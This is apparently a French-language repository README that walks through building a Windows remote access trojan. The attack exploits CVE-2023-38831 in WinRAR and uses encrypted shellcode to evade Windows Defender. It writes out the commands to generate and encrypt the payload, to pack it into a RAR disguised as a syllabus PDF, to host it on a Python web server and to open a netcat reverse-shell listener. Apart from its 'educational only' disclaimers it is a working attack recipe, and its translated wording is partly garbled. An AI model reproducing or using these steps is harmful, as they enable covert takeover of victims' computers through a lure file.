
Trojan d'accès à distance (RAT) pour Windows x64 utilisant une combinaison de la vulnérabilité CVE-2023-38831 (vulnérabilité WinRAR < 6.23) et de la technique d'exploitation Shellcode.
Développer un RAT Windows x64 en utilisant CVE-2023-38831 (WinRAR < 6.23) et l'exploitation de Shellcode pour contourner Windows Defender.
Avertissement : Ces informations sont fournies à des fins éducatives uniquement. L'utilisation non autorisée de ces techniques est illégale et contraire à l'éthique.
Fabriquer le Shellcode
51721.py pour générer le shellcode initial.Modifier et compiler le Shellcode
Chiffrer l'exécutable
decrypt_file.ps1 pour chiffrer l'exécutable compilé :
.\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
Créer une archive WinRAR
cve-2023-38831-exp-gen.py pour créer l'archive :
python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
Configurer un serveur Python pour le téléchargement de fichiers
enc_main.exe et decrypt_file.ps1.python3 -m http.server 8000
Préparer l'écoute de la coque TCP inverse
nc -lnvp 4444
Déclencher la coque TCP inverse
Ces informations sont fournies à des fins éducatives uniquement. L'utilisation de cet exploit sans autorisation explicite est illégale et contraire à l'éthique. L'auteur décline toute responsabilité en cas d'utilisation abusive de ces informations.